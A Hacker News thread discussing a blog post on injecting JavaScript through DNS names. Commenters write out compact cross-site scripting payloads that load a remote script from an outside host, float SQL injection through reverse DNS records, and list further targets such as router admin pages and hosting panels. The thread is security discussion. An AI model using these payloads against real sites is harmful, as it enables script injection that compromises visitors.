

Stuffing Javascript into DNS names - coderdude
http://www.skullsecurity.org/blog/?p=433

======
jerf
Making a script tag load an arbitrary remote script file without a space:

    
    
        <script>s=document.createElement("script");
                s.setAttribute("src","http://www.skullsecurity.org/test-js.js");
                document.body.appendChild(s)<script>
    

For our convenience I put newlines in, just remove them. I checked it on the
javascript: line (where you have to add javascript:, surround it with void(),
and change the semicolons to commas). If that doesn't exactly work, something
like it could. Any JS framework with the ability to use objects to set
attributes on a new tag could be written more concisely but this doesn't
depend on any frameworks.

~~~
Sephr
appendChild returns the appended child, so you can shorten that to the
following:

    
    
        <script>document.body.appendChild(document.createElement("script")).src="http://www.skullsecurity.org/test-js.js"</script>

------
wccrawford
The reverse DNS bit would be amazing. Do a bobby tables on it and watch sites
fall just from visiting them.

Of course I wouldn't -do- such a thing, but it would be crazy to see.

------
olalonde
They really mean it when they say "never trust user input".

------
carson
Even though he only brings it up at the end reverse DNS entries could end up
being the scariest.

------
scg
Other potential attack targets: admin UIs for routers, webhosting cpanels, web
crawlers with DNS cache.

